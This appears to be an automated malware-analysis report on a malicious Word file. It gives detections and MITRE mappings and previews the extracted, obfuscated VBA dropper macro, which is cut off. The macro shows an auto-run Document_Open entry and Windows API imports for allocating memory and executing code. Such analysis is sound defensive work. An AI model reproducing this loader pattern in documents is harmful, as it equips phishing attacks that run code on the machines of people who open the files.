MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains VBA macros, including a Document_Open macro, indicating an attempt to execute code upon opening. The presence of obfuscated VBA code suggests the macro is designed to download and execute a secondary payload, a common technique for malware droppers. The specific macro functions and API calls hint at memory manipulation and execution, further supporting this assessment.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6400143-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6400143-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 78241 bytes |
SHA-256: 3c9a368c59bdcd32142c15582c7b12312d43085d045f265c00bac7f0d2b23416 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If Vba7 Then PRIVate DeCLaRe PTrsafE FunCTIOn QFlm2dNcITrWeNVo03ro lIB "UsEr32" aLiAs "CallWindowProcW" (byvAl fmS7VYcVzYmRTs As LOnGpTR, BYvAl XketR46D aS lONGpTr, bYVAL oaHn as LonG, BYVal b20xbu As LONgptR, bYVal fOWfDAe9XOSjhC aS loNgPtr) aS lONgPtR PriVATE decLaRE pTrSAfe fUnCtiON zXmCvbMILN lib "KeRNeL32" aLIas "HeapCreate" (bYvaL zBWMB AS Long, ByvAl ZC65TWQzDI aS loNgPtr, byVaL F40Dz6aLnO As LONgptR) AS longPTR prIvATe DeCLare pTRSaFe FUnctIoN KfH8yJTuodzOM5JgQrvE lIb "kERNEl32" alIaS "HeapAlloc" (Byval MmhTE0 as LoNgPTr, ByVal S6RFOm aS LOng, bYvaL TLE As lONgptr) aS lOngPTR priVATe DecLaRe pTRSAfe SUb FRI6v94whT lIB "kErNEl32" aliAS "RtlMoveMemory" (NxS aS any, byReF MR3MkjHgM9xS8 AS anY, BYVal s17 as LonG) #Else Private Declare Function qfLm2DNcItRWenvo03RO Lib "usEr32" Alias "CallWindowProcW" (ByVal iEXbM6Zt As Long, ByVal WxbyCvT As Long, ByVal vAqTNm As Long, ByVal sTVYApxGkdJ As Long, ByVal m33AW5VA2ZpS0Hx As Long) As Long Private Declare Function ZXmcvBmILn Lib "KeRneL32" Alias "HeapCreate" (ByVal fket As Long, ByVal csvh40BH As Long, ByVal ybn As Long) As Long Private Declare Function KfH8yJTuodzOM5JgQrvE Lib "KeRneL32" Alias "HeapAlloc" (ByVal HIc3vi As Long, ByVal rj2 As Long, ByVal XSGB As Long) As Long Private Declare Sub FrI6V94wht Lib "KeRneL32" Alias "RtlMoveMemory" (tdge3tmWn9C6R As Any, ByRef I5bmO As Any, ByVal InZOc As Long) #End If Sub dOcUMeNt_OPen() Call FjqQ3jagNrSSVdY8x5cKPB End Sub Private Function FjqQ3jagNrSSVdY8x5cKPB() As Double Call Oa95Kkbvc4PziElL6k5hGEN End Function Private Function Oa95Kkbvc4PziElL6k5hGEN() As Integer Call W9TSajxymLfoKnvGI9vwI9jI End Function Static Function W9TSajxymLfoKnvGI9vwI9jI() As Variant Call X1mqLzcYtZi6 End Function Private Function X1mqLzcYtZi6() As Boolean Call KCTDikvjG6JFuOJhIM5 End Function Function KCTDikvjG6JFuOJhIM5() As Object Call wFjiWZfq4N3S4lDa6rrukz End Function Function wFjiWZfq4N3S4lDa6rrukz() As String Call gdZO2PZioX9KkVvkW1 End Function Private Function gdZO2PZioX9KkVvkW1() As Date Call RP6U5hAiJhQOBrucr5 End Function Static Function RP6U5hAiJhQOBrucr5() As Double Call WW3pagLLsaTrEMjbC09 End Function Function WW3pagLLsaTrEMjbC09() As Byte Call fss3lWYF1s41zwa9T4cxFi0DB End Function Public Function fss3lWYF1s41zwa9T4cxFi0DB() As String Call YW75YejJ6UNJwQvXUcpXY End Function Static Function YW75YejJ6UNJwQvXUcpXY() As Single Call uTrs8zRkurfS End Function Sub uTrs8zRkurfS() Call ixJUiVD02V5q End Sub Static Function ixJUiVD02V5q() As Double Call iS35UktV62HBwgHFiiv End Function Function iS35UktV62HBwgHFiiv() As Object Call EhPyublqQfHkcxhE6N1ic9 End Function Function EhPyublqQfHkcxhE6N1ic9() As Object Call kbjoYFxuopNu8ldYUT End Function Private Function kbjoYFxuopNu8ldYUT() As Double Call OmtXWgvPw8nfYOLZqydlisN End Function Private Function OmtXWgvPw8nfYOLZqydlisN() As Double Call Gs1hoIxDM8BByUNvEgVDuwH End Function Private Function Gs1hoIxDM8BByUNvEgVDuwH() As Double Call m6l9O2bnmWvLWi3L2Ud3C2Z End Function Private Function m6l9O2bnmWvLWi3L2Ud3C2Z() As Integer Call iPRKIjLOoZRWiZHC8HnCYdRY End Function Static Function iPRKIjLOoZRWiZHC8HnCYdRY() As Currency Call XiuFXuyblI41dgMDXyqNX End Function Static Function XiuFXuyblI41dgMDXyqNX() As Double Call SGTn8G3X20ZdCOZLwujHckB End Function Private Function SGTn8G3X20ZdCOZLwujHckB() As Date Call hPMmvReCXX0sTp2oNp End Function Static Function hPMmvReCXX0sTp2oNp() As Integer Call qtPaO3XQ6rdM65Dy6pfA End Function Public Function qtPaO3XQ6rdM65Dy6pfA() As Boolean Call JNKUnTqipdyS1R End Function Public Function JNKUnTqipdyS1R() As Object Call guNXsOnzQqVZAatz0sJdS End Function Static Function guNXsOnzQqVZAatz0sJdS() As Single Call q1BqcXfcgV3s End Function Public Function q1BqcXfcgV3s() As Long Call TQ0rJq ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.